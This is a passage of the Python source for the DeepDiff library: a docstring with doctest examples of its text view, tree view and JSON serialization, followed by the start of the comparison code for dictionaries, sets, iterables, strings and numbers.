set, frozenset, OrderedDict, NamedTuple and custom objects!\n\n **Text View**\n\n Text view is the original and currently the default view of DeepDiff.\n\n It is called text view because the results contain texts that represent the path to the data:\n\n Example of using the text view.\n >>> from deepdiff import DeepDiff\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2)\n >>> print(ddiff)\n {'dictionary_item_added': {'root[5]', 'root[6]'}, 'dictionary_item_removed': {'root[4]'}}\n\n So for example ddiff['dictionary_item_removed'] is a set if strings thus this is called the text view.\n\n .. 
seealso::\n The following examples are using the *default text view.*\n The Tree View is introduced in DeepDiff v3 and provides\n traversing capabilitie through your diffed data and more!\n Read more about the Tree View at the bottom of this page.\n\n Importing\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n\n Same object returns empty\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = t1\n >>> print(DeepDiff(t1, t2))\n {}\n\n Type of an item has changed\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:\"2\", 3:3}\n >>> pprint(DeepDiff(t1, t2), indent=2)\n { 'type_changes': { 'root[2]': { 'new_type': ,\n 'new_value': '2',\n 'old_type': ,\n 'old_value': 2}}}\n\n Value of an item has changed\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:4, 3:3}\n >>> pprint(DeepDiff(t1, t2, verbose_level=0), indent=2)\n {'values_changed': {'root[2]': {'new_value': 4, 'old_value': 2}}}\n\n Item added and/or removed\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff)\n {'dictionary_item_added': {'root[5]', 'root[6]'},\n 'dictionary_item_removed': {'root[4]'}}\n\n Set verbose level to 2 in order to see the added or removed items with their values\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2, verbose_level=2)\n >>> pprint(ddiff, indent=2)\n { 'dictionary_item_added': {'root[5]': 5, 'root[6]': 6},\n 'dictionary_item_removed': {'root[4]': 4}}\n\n String difference\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\"}}\n >>> t2 = {1:1, 2:4, 3:3, 4:{\"a\":\"hello\", \"b\":\"world!\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'values_changed': { 'root[2]': {'new_value': 4, 'old_value': 2},\n \"root[4]['b']\": { 'new_value': 'world!',\n 'old_value': 'world'}}}\n\n\n String difference 2\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world!\\nGoodbye!\\n1\\n2\\nEnd\"}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\\n1\\n2\\nEnd\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'values_changed': { \"root[4]['b']\": { 'diff': '--- \\n'\n '+++ \\n'\n '@@ -1,5 +1,4 @@\\n'\n '-world!\\n'\n '-Goodbye!\\n'\n '+world\\n'\n ' 1\\n'\n ' 2\\n'\n ' End',\n 'new_value': 'world\\n1\\n2\\nEnd',\n 'old_value': 'world!\\n'\n 'Goodbye!\\n'\n '1\\n'\n '2\\n'\n 'End'}}}\n\n >>>\n >>> print (ddiff['values_changed'][\"root[4]['b']\"][\"diff\"])\n --- \n +++ \n @@ -1,5 +1,4 @@\n -world!\n -Goodbye!\n +world\n 1\n 2\n End\n\n\n Type change\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\\n\\n\\nEnd\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'type_changes': { \"root[4]['b']\": { 'new_type': ,\n 'new_value': 'world\\n\\n\\nEnd',\n 'old_type': ,\n 'old_value': [1, 2, 3]}}}\n\n And if you don't care about the value of items that have changed type, please set verbose level to 0\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:\"2\", 3:3}\n >>> pprint(DeepDiff(t1, t2, verbose_level=0), indent=2)\n { 'type_changes': { 'root[2]': { 'new_type': ,\n 'old_type': }}}\n\n List difference\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3, 4]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n {'iterable_item_removed': {\"root[4]['b'][2]\": 3, \"root[4]['b'][3]\": 4}}\n\n List difference 2:\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 
4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'iterable_item_added': {\"root[4]['b'][3]\": 3},\n 'values_changed': { \"root[4]['b'][1]\": {'new_value': 3, 'old_value': 2},\n \"root[4]['b'][2]\": {'new_value': 2, 'old_value': 3}}}\n\n List difference ignoring order or duplicates: (with the same dictionaries as above)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True)\n >>> print (ddiff)\n {}\n\n List difference ignoring order but reporting repetitions:\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n >>> t1 = [1, 3, 1, 4]\n >>> t2 = [4, 4, 1]\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True)\n >>> pprint(ddiff, indent=2)\n { 'iterable_item_removed': {'root[1]': 3},\n 'repetition_change': { 'root[0]': { 'new_indexes': [2],\n 'new_repeat': 1,\n 'old_indexes': [0, 2],\n 'old_repeat': 2,\n 'value': 1},\n 'root[3]': { 'new_indexes': [0, 1],\n 'new_repeat': 2,\n 'old_indexes': [3],\n 'old_repeat': 1,\n 'value': 4}}}\n\n List that contains dictionary:\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:1, 2:2}]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:3}]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'dictionary_item_removed': {\"root[4]['b'][2][2]\"},\n 'values_changed': {\"root[4]['b'][2][1]\": {'new_value': 3, 'old_value': 1}}}\n\n Sets:\n >>> t1 = {1, 2, 8}\n >>> t2 = {1, 2, 3, 5}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint(ddiff)\n {'set_item_added': {'root[5]', 'root[3]'}, 'set_item_removed': {'root[8]'}}\n\n Named Tuples:\n >>> from collections import namedtuple\n >>> Point = namedtuple('Point', ['x', 'y'])\n >>> t1 = Point(x=11, y=22)\n >>> t2 = Point(x=11, y=23)\n >>> pprint (DeepDiff(t1, t2))\n {'values_changed': {'root.y': {'new_value': 23, 'old_value': 22}}}\n\n Custom objects:\n >>> class ClassA(object):\n ... a = 1\n ... def __init__(self, b):\n ... self.b = b\n ...\n >>> t1 = ClassA(1)\n >>> t2 = ClassA(2)\n >>>\n >>> pprint(DeepDiff(t1, t2))\n {'values_changed': {'root.b': {'new_value': 2, 'old_value': 1}}}\n\n Object attribute added:\n >>> t2.c = \"new attribute\"\n >>> pprint(DeepDiff(t1, t2))\n {'attribute_added': {'root.c'},\n 'values_changed': {'root.b': {'new_value': 2, 'old_value': 1}}}\n\n Approximate decimals comparison (Significant digits after the point):\n >>> t1 = Decimal('1.52')\n >>> t2 = Decimal('1.57')\n >>> DeepDiff(t1, t2, significant_digits=0)\n {}\n >>> DeepDiff(t1, t2, significant_digits=1)\n {'values_changed': {'root': {'old_value': Decimal('1.52'), 'new_value': Decimal('1.57')}}}\n\n Approximate float comparison (Significant digits after the point):\n >>> t1 = [ 1.1129, 1.3359 ]\n >>> t2 = [ 1.113, 1.3362 ]\n >>> pprint(DeepDiff(t1, t2, significant_digits=3))\n {}\n >>> pprint(DeepDiff(t1, t2))\n {'values_changed': {'root[0]': {'new_value': 1.113, 'old_value': 1.1129},\n 'root[1]': {'new_value': 1.3362, 'old_value': 1.3359}}}\n >>> pprint(DeepDiff(1.23*10**20, 1.24*10**20, significant_digits=1))\n {'values_changed': {'root': {'new_value': 1.24e+20, 'old_value': 1.23e+20}}}\n\n\n .. note::\n All the examples for the text view work for the tree view too. 
You just need to set view='tree' to get it in tree form.\n\n\n **Tree View**\n\n Starting the version 3 You can chooe the view into the deepdiff results.\n The tree view provides you with tree objects that you can traverse through to find\n the parents of the objects that are diffed and the actual objects that are being diffed.\n This view is very useful when dealing with nested objects.\n Note that tree view always returns results in the form of Python sets.\n\n You can traverse through the tree elements!\n\n .. note::\n The Tree view is just a different representation of the diffed data.\n Behind the scene, DeepDiff creates the tree view first and then converts it to textual representation for the text view.\n\n .. code:: text\n\n +---------------------------------------------------------------+\n | |\n | parent(t1) parent node parent(t2) |\n | + ^ + |\n +------|--------------------------|---------------------|-------+\n | | | up |\n | Child | | | ChildRelationship\n | Relationship | | |\n | down | | |\n +------|----------------------|-------------------------|-------+\n | v v v |\n | child(t1) child node child(t2) |\n | |\n +---------------------------------------------------------------+\n\n\n :up: Move up to the parent node\n :down: Move down to the child node\n :path(): Get the path to the current node\n :t1: The first item in the current node that is being diffed\n :t2: The second item in the current node that is being diffed\n :additional: Additional information about the node i.e. repetition\n :repetition: Shortcut to get the repetition report\n\n\n The tree view allows you to have more than mere textual representaion of the diffed objects.\n It gives you the actual objects (t1, t2) throughout the tree of parents and children.\n\n **Examples Tree View**\n\n .. note::\n The Tree View is introduced in DeepDiff 3.\n Set view='tree' in order to use this view.\n\n Value of an item has changed (Tree View)\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:4, 3:3}\n >>> ddiff_verbose0 = DeepDiff(t1, t2, verbose_level=0, view='tree')\n >>> ddiff_verbose0\n {'values_changed': {}}\n >>>\n >>> ddiff_verbose1 = DeepDiff(t1, t2, verbose_level=1, view='tree')\n >>> ddiff_verbose1\n {'values_changed': {}}\n >>> set_of_values_changed = ddiff_verbose1['values_changed']\n >>> # since set_of_values_changed includes only one item in a set\n >>> # in order to get that one item we can:\n >>> (changed,) = set_of_values_changed\n >>> changed # Another way to get this is to do: changed=list(set_of_values_changed)[0]\n \n >>> changed.t1\n 2\n >>> changed.t2\n 4\n >>> # You can traverse through the tree, get to the parents!\n >>> changed.up\n \n\n List difference (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3, 4]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> ddiff\n {'iterable_item_removed': {, }}\n >>> # Note that the iterable_item_removed is a set. 
In this case it has 2 items in it.\n >>> # One way to get one item from the set is to convert it to a list\n >>> # And then get the first item of the list:\n >>> removed = list(ddiff['iterable_item_removed'])[0]\n >>> removed\n \n >>>\n >>> parent = removed.up\n >>> parent\n \n >>> parent.path()\n \"root[4]['b']\"\n >>> parent.t1\n [1, 2, 3, 4]\n >>> parent.t2\n [1, 2]\n >>> parent.up\n \n >>> parent.up.up\n \n >>> parent.up.up.t1\n {1: 1, 2: 2, 3: 3, 4: {'a': 'hello', 'b': [1, 2, 3, 4]}}\n >>> parent.up.up.t1 == t1 # It is holding the original t1 that we passed to DeepDiff\n True\n\n List difference 2 (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint(ddiff, indent = 2)\n { 'iterable_item_added': {},\n 'values_changed': { ,\n }}\n >>>\n >>> # Note that iterable_item_added is a set with one item.\n >>> # So in order to get that one item from it, we can do:\n >>>\n >>> (added,) = ddiff['iterable_item_added']\n >>> added\n \n >>> added.up.up\n \n >>> added.up.up.path()\n 'root[4]'\n >>> added.up.up.down\n \n >>>\n >>> # going up twice and then down twice gives you the same node in the tree:\n >>> added.up.up.down.down == added\n True\n\n List difference ignoring order but reporting repetitions (Tree View)\n >>> t1 = [1, 3, 1, 4]\n >>> t2 = [4, 4, 1]\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True, view='tree')\n >>> pprint(ddiff, indent=2)\n { 'iterable_item_removed': {},\n 'repetition_change': { ,\n }}\n >>>\n >>> # repetition_change is a set with 2 items.\n >>> # in order to get those 2 items, we can do the following.\n >>> # or we can convert the set to list and get the list items.\n >>> # or we can iterate through the set items\n >>>\n >>> (repeat1, repeat2) = ddiff['repetition_change']\n >>> repeat1 # the default verbosity is set to 1.\n \n >>> # The actual data regarding the repetitions can be found in the repetition attribute:\n >>> repeat1.repetition\n {'old_repeat': 1, 'new_repeat': 2, 'old_indexes': [3], 'new_indexes': [0, 1]}\n >>>\n >>> # If you change the verbosity, you will see less:\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True, view='tree', verbose_level=0)\n >>> ddiff\n {'repetition_change': {, }, 'iterable_item_removed': {}}\n >>> (repeat1, repeat2) = ddiff['repetition_change']\n >>> repeat1\n \n >>>\n >>> # But the verbosity level does not change the actual report object.\n >>> # It only changes the textual representaion of the object. 
We get the actual object here:\n >>> repeat1.repetition\n {'old_repeat': 1, 'new_repeat': 2, 'old_indexes': [3], 'new_indexes': [0, 1]}\n >>> repeat1.t1\n 4\n >>> repeat1.t2\n 4\n >>> repeat1.up\n \n\n List that contains dictionary (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:1, 2:2}]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:3}]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint (ddiff, indent = 2)\n { 'dictionary_item_removed': {},\n 'values_changed': {}}\n\n Sets (Tree View):\n >>> t1 = {1, 2, 8}\n >>> t2 = {1, 2, 3, 5}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> print(ddiff)\n {'set_item_removed': {}, 'set_item_added': {, }}\n >>> # grabbing one item from set_item_removed set which has one item only\n >>> (item,) = ddiff['set_item_removed']\n >>> item.up\n \n >>> item.up.t1 == t1\n True\n\n Named Tuples (Tree View):\n >>> from collections import namedtuple\n >>> Point = namedtuple('Point', ['x', 'y'])\n >>> t1 = Point(x=11, y=22)\n >>> t2 = Point(x=11, y=23)\n >>> print(DeepDiff(t1, t2, view='tree'))\n {'values_changed': {}}\n\n Custom objects (Tree View):\n >>> class ClassA(object):\n ... a = 1\n ... def __init__(self, b):\n ... self.b = b\n ...\n >>> t1 = ClassA(1)\n >>> t2 = ClassA(2)\n >>>\n >>> print(DeepDiff(t1, t2, view='tree'))\n {'values_changed': {}}\n\n Object attribute added (Tree View):\n >>> t2.c = \"new attribute\"\n >>> pprint(DeepDiff(t1, t2, view='tree'))\n {'attribute_added': {},\n 'values_changed': {}}\n\n Approximate decimals comparison (Significant digits after the point) (Tree View):\n >>> t1 = Decimal('1.52')\n >>> t2 = Decimal('1.57')\n >>> DeepDiff(t1, t2, significant_digits=0, view='tree')\n {}\n >>> ddiff = DeepDiff(t1, t2, significant_digits=1, view='tree')\n >>> ddiff\n {'values_changed': {}}\n >>> (change1,) = ddiff['values_changed']\n >>> change1\n \n >>> change1.t1\n Decimal('1.52')\n >>> change1.t2\n Decimal('1.57')\n >>> change1.path()\n 'root'\n\n Approximate float comparison (Significant digits after the point) (Tree View):\n >>> t1 = [ 1.1129, 1.3359 ]\n >>> t2 = [ 1.113, 1.3362 ]\n >>> ddiff = DeepDiff(t1, t2, significant_digits=3, view='tree')\n >>> ddiff\n {}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint(ddiff, indent=2)\n { 'values_changed': { ,\n }}\n >>> ddiff = DeepDiff(1.23*10**20, 1.24*10**20, significant_digits=1, view='tree')\n >>> ddiff\n {'values_changed': {}}\n\n\n .. note::\n All the examples for the text view work for the tree view too. 
You just need to set view='tree' to get it in tree form.\n\n **Serialization**\n\n DeepDiff uses jsonpickle in order to serialize and deserialize its results into json.\n\n Serialize and then deserialize back to deepdiff\n >>> t1 = {1: 1, 2: 2, 3: 3}\n >>> t2 = {1: 1, 2: \"2\", 3: 3}\n >>> ddiff = DeepDiff(t1, t2)\n >>> jsoned = ddiff.json\n >>> jsoned\n '{\"type_changes\": {\"root[2]\": {\"py/object\": \"deepdiff.helper.RemapDict\", \"new_type\": {\"py/type\": \"__builtin__.str\"}, \"new_value\": \"2\", \"old_type\": {\"py/type\": \"__builtin__.int\"}, \"old_value\": 2}}}'\n >>> ddiff_new = DeepDiff.from_json(jsoned)\n >>> ddiff == ddiff_new\n True\n\n **Pycon 2016 Talk**\n I gave a talk about how DeepDiff does what it does at Pycon 2016.\n `Diff it to Dig it Pycon 2016 video `_\n\n And here is more info: http://zepworks.com/blog/diff-it-to-digg-it/\n\n\n \"\"\"\n\n def __init__(self,\n t1,\n t2,\n ignore_order=False,\n report_repetition=False,\n significant_digits=None,\n exclude_paths=set(),\n exclude_types=set(),\n verbose_level=1,\n view='text',\n **kwargs):\n if kwargs:\n raise ValueError((\n \"The following parameter(s) are not valid: %s\\n\"\n \"The valid parameters are ignore_order, report_repetition, significant_digits,\"\n \"exclude_paths, exclude_types, verbose_level and view.\") % ', '.join(kwargs.keys()))\n\n self.ignore_order = ignore_order\n self.report_repetition = report_repetition\n self.exclude_paths = set(exclude_paths)\n self.exclude_types = set(exclude_types)\n self.exclude_types_tuple = tuple(\n exclude_types) # we need tuple for checking isinstance\n self.hashes = {}\n\n if significant_digits is not None and significant_digits < 0:\n raise ValueError(\n \"significant_digits must be None or a non-negative integer\")\n self.significant_digits = significant_digits\n\n self.tree = TreeResult()\n\n Verbose.level = verbose_level\n\n root = DiffLevel(t1, t2)\n self.__diff(root, parents_ids=frozenset({id(t1)}))\n\n self.tree.cleanup()\n\n if view == 'tree':\n self.update(self.tree)\n del self.tree\n else:\n result_text = TextResult(tree_results=self.tree)\n result_text.cleanup() # clean up text-style result dictionary\n self.update(\n result_text\n ) # be compatible to DeepDiff 2.x if user didn't specify otherwise\n\n # TODO: adding adding functionality\n # def __add__(self, other):\n # if isinstance(other, DeepDiff):\n # result = deepcopy(self)\n # result.update(other)\n # else:\n # result = deepcopy(other)\n # for key in REPORT_KEYS:\n # if key in self:\n # getattr(self, \"_do_{}\".format(key))(result)\n\n # return result\n\n # __radd__ = __add__\n\n # def _do_iterable_item_added(self, result):\n # for item in self['iterable_item_added']:\n # pass\n\n def __report_result(self, report_type, level):\n \"\"\"\n Add a detected change to the reference-style result dictionary.\n report_type will be added to level.\n (We'll create the text-style report from there later.)\n :param report_type: A well defined string key describing the type of change.\n Examples: \"set_item_added\", \"values_changed\"\n :param parent: A DiffLevel object describing the objects in question in their\n before-change and after-change object structure.\n\n :rtype: None\n \"\"\"\n if not self.__skip_this(level):\n level.report_type = report_type\n self.tree[report_type].add(level)\n\n @staticmethod\n def __add_to_frozen_set(parents_ids, item_id):\n parents_ids = set(parents_ids)\n parents_ids.add(item_id)\n return frozenset(parents_ids)\n\n @staticmethod\n def __dict_from_slots(object):\n def 
unmangle(attribute):\n if attribute.startswith('__'):\n return '_{type}{attribute}'.format(\n type=type(object).__name__,\n attribute=attribute\n )\n return attribute\n\n slots = object.__slots__\n if isinstance(slots, strings):\n return {slots: getattr(object, unmangle(slots))}\n return {i: getattr(object, unmangle(i)) for i in slots}\n\n def __diff_obj(self, level, parents_ids=frozenset({}),\n is_namedtuple=False):\n \"\"\"Difference of 2 objects\"\"\"\n try:\n if is_namedtuple:\n t1 = level.t1._asdict()\n t2 = level.t2._asdict()\n else:\n t1 = level.t1.__dict__\n t2 = level.t2.__dict__\n except AttributeError:\n try:\n t1 = self.__dict_from_slots(level.t1)\n t2 = self.__dict_from_slots(level.t2)\n except AttributeError:\n self.__report_result('unprocessed', level)\n return\n\n self.__diff_dict(\n level,\n parents_ids,\n print_as_attribute=True,\n override=True,\n override_t1=t1,\n override_t2=t2)\n\n def __skip_this(self, level):\n \"\"\"\n Check whether this comparison should be skipped because one of the objects to compare meets exclusion criteria.\n :rtype: bool\n \"\"\"\n skip = False\n if self.exclude_paths and level.path() in self.exclude_paths:\n skip = True\n else:\n if isinstance(level.t1, self.exclude_types_tuple) or isinstance(\n level.t2, self.exclude_types_tuple):\n skip = True\n\n return skip\n\n def __diff_dict(self,\n level,\n parents_ids=frozenset({}),\n print_as_attribute=False,\n override=False,\n override_t1=None,\n override_t2=None):\n \"\"\"Difference of 2 dictionaries\"\"\"\n if override:\n # for special stuff like custom objects and named tuples we receive preprocessed t1 and t2\n # but must not spoil the chain (=level) with it\n t1 = override_t1\n t2 = override_t2\n else:\n t1 = level.t1\n t2 = level.t2\n\n if print_as_attribute:\n item_added_key = \"attribute_added\"\n item_removed_key = \"attribute_removed\"\n rel_class = AttributeRelationship\n else:\n item_added_key = \"dictionary_item_added\"\n item_removed_key = \"dictionary_item_removed\"\n rel_class = DictRelationship\n\n t1_keys = set(t1.keys())\n t2_keys = set(t2.keys())\n\n t_keys_intersect = t2_keys.intersection(t1_keys)\n\n t_keys_added = t2_keys - t_keys_intersect\n t_keys_removed = t1_keys - t_keys_intersect\n\n for key in t_keys_added:\n change_level = level.branch_deeper(\n notpresent,\n t2[key],\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__report_result(item_added_key, change_level)\n\n for key in t_keys_removed:\n change_level = level.branch_deeper(\n t1[key],\n notpresent,\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__report_result(item_removed_key, change_level)\n\n for key in t_keys_intersect: # key present in both dicts - need to compare values\n item_id = id(t1[key])\n if parents_ids and item_id in parents_ids:\n continue\n parents_ids_added = self.__add_to_frozen_set(parents_ids, item_id)\n\n # Go one level deeper\n next_level = level.branch_deeper(\n t1[key],\n t2[key],\n child_relationship_class=rel_class,\n child_relationship_param=key)\n self.__diff(next_level, parents_ids_added)\n\n def __diff_set(self, level):\n \"\"\"Difference of sets\"\"\"\n t1_hashtable = self.__create_hashtable(level.t1, level)\n t2_hashtable = self.__create_hashtable(level.t2, level)\n\n t1_hashes = set(t1_hashtable.keys())\n t2_hashes = set(t2_hashtable.keys())\n\n hashes_added = t2_hashes - t1_hashes\n hashes_removed = t1_hashes - t2_hashes\n\n items_added = [t2_hashtable[i].item for i in hashes_added]\n items_removed = [t1_hashtable[i].item 
for i in hashes_removed]\n\n for item in items_added:\n change_level = level.branch_deeper(\n notpresent, item, child_relationship_class=SetRelationship)\n self.__report_result('set_item_added', change_level)\n\n for item in items_removed:\n change_level = level.branch_deeper(\n item, notpresent, child_relationship_class=SetRelationship)\n self.__report_result('set_item_removed', change_level)\n\n @staticmethod\n def __iterables_subscriptable(t1, t2):\n try:\n if getattr(t1, '__getitem__') and getattr(t2, '__getitem__'):\n return True\n else: # pragma: no cover\n return False # should never happen\n except AttributeError:\n return False\n\n def __diff_iterable(self, level, parents_ids=frozenset({})):\n \"\"\"Difference of iterables\"\"\"\n # We're handling both subscriptable and non-subscriptable iterables. Which one is it?\n subscriptable = self.__iterables_subscriptable(level.t1, level.t2)\n if subscriptable:\n child_relationship_class = SubscriptableIterableRelationship\n else:\n child_relationship_class = NonSubscriptableIterableRelationship\n\n for i, (x, y) in enumerate(\n zip_longest(\n level.t1, level.t2, fillvalue=ListItemRemovedOrAdded)):\n if y is ListItemRemovedOrAdded: # item removed completely\n change_level = level.branch_deeper(\n x,\n notpresent,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__report_result('iterable_item_removed', change_level)\n\n elif x is ListItemRemovedOrAdded: # new item added\n change_level = level.branch_deeper(\n notpresent,\n y,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__report_result('iterable_item_added', change_level)\n\n else: # check if item value has changed\n item_id = id(x)\n if parents_ids and item_id in parents_ids:\n continue\n parents_ids_added = self.__add_to_frozen_set(parents_ids,\n item_id)\n\n # Go one level deeper\n next_level = level.branch_deeper(\n x,\n y,\n child_relationship_class=child_relationship_class,\n child_relationship_param=i)\n self.__diff(next_level, parents_ids_added)\n\n def __diff_str(self, level):\n \"\"\"Compare strings\"\"\"\n if level.t1 == level.t2:\n return\n\n # do we add a diff for convenience?\n do_diff = True\n if isinstance(level.t1, bytes_type):\n try:\n t1_str = level.t1.decode('ascii')\n t2_str = level.t2.decode('ascii')\n except UnicodeDecodeError:\n do_diff = False\n else:\n t1_str = level.t1\n t2_str = level.t2\n if do_diff:\n if u'\\n' in t1_str or u'\\n' in t2_str:\n diff = difflib.unified_diff(\n t1_str.splitlines(), t2_str.splitlines(), lineterm='')\n diff = list(diff)\n if diff:\n level.additional['diff'] = u'\\n'.join(diff)\n\n self.__report_result('values_changed', level)\n\n def __diff_tuple(self, level, parents_ids):\n # Checking to see if it has _fields. 
Which probably means it is a named\n # tuple.\n try:\n level.t1._asdict\n # It must be a normal tuple\n except AttributeError:\n self.__diff_iterable(level, parents_ids)\n # We assume it is a namedtuple then\n else:\n self.__diff_obj(level, parents_ids, is_namedtuple=True)\n\n def __create_hashtable(self, t, level):\n \"\"\"Create hashtable of {item_hash: item}\"\"\"\n\n def add_hash(hashes, item_hash, item, i):\n if item_hash in hashes:\n hashes[item_hash].indexes.append(i)\n else:\n hashes[item_hash] = IndexedHash([i], item)\n\n hashes = {}\n for (i, item) in enumerate(t):\n try:\n hashes_all = DeepHash(item,\n hashes=self.hashes,\n significant_digits=self.significant_digits)\n item_hash = hashes_all.get(id(item), item)\n except Exception as e: # pragma: no cover\n logger.warning(\"Can not produce a hash for %s.\"\n \"Not counting this object.\\n %s\" %\n (level.path(), e))\n else:\n if item_hash is hashes_all.unprocessed: # pragma: no cover\n logger.warning(\"Item %s was not processed while hashing \"\n \"thus not counting this object.\" %\n level.path())\n else:\n add_hash(hashes, item_hash, item, i)\n return hashes\n\n def __diff_iterable_with_contenthash(self, level):\n \"\"\"Diff of unhashable iterables. Only used when ignoring the order.\"\"\"\n t1_hashtable = self.__create_hashtable(level.t1, level)\n t2_hashtable = self.__create_hashtable(level.t2, level)\n\n t1_hashes = set(t1_hashtable.keys())\n t2_hashes = set(t2_hashtable.keys())\n\n hashes_added = t2_hashes - t1_hashes\n hashes_removed = t1_hashes - t2_hashes\n\n if self.report_repetition:\n for hash_value in hashes_added:\n for i in t2_hashtable[hash_value].indexes:\n change_level = level.branch_deeper(\n notpresent,\n t2_hashtable[hash_value].item,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=i\n ) # TODO: what is this value exactly?\n self.__report_result('iterable_item_added', change_level)\n\n for hash_value in hashes_removed:\n for i in t1_hashtable[hash_value].indexes:\n change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n notpresent,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=i)\n self.__report_result('iterable_item_removed', change_level)\n\n items_intersect = t2_hashes.intersection(t1_hashes)\n\n for hash_value in items_intersect:\n t1_indexes = t1_hashtable[hash_value].indexes\n t2_indexes = t2_hashtable[hash_value].indexes\n t1_indexes_len = len(t1_indexes)\n t2_indexes_len = len(t2_indexes)\n if t1_indexes_len != t2_indexes_len: # this is a repetition change!\n # create \"change\" entry, keep current level untouched to handle further changes\n repetition_change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n t2_hashtable[hash_value].item, # nb: those are equal!\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t1_hashtable[hash_value]\n .indexes[0])\n repetition_change_level.additional['repetition'] = RemapDict(\n old_repeat=t1_indexes_len,\n new_repeat=t2_indexes_len,\n old_indexes=t1_indexes,\n new_indexes=t2_indexes)\n self.__report_result('repetition_change',\n repetition_change_level)\n\n else:\n for hash_value in hashes_added:\n change_level = level.branch_deeper(\n notpresent,\n t2_hashtable[hash_value].item,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t2_hashtable[hash_value].indexes[\n 
0]) # TODO: what is this value exactly?\n self.__report_result('iterable_item_added', change_level)\n\n for hash_value in hashes_removed:\n change_level = level.branch_deeper(\n t1_hashtable[hash_value].item,\n notpresent,\n child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie!\n child_relationship_param=t1_hashtable[hash_value].indexes[\n 0])\n self.__report_result('iterable_item_removed', change_level)\n\n def __diff_numbers(self, level):\n \"\"\"Diff Numbers\"\"\"\n\n if self.significant_digits is not None and isinstance(level.t1, (\n float, complex, Decimal)):\n # Bernhard10: I use string formatting for comparison, to be consistent with usecases where\n # data is read from files that were previousely written from python and\n # to be consistent with on-screen representation of numbers.\n # Other options would be abs(t1-t2)<10**-self.significant_digits\n # or math.is_close (python3.5+)\n # Note that abs(3.25-3.251) = 0.0009999999999998899 < 0.001\n # Note also that 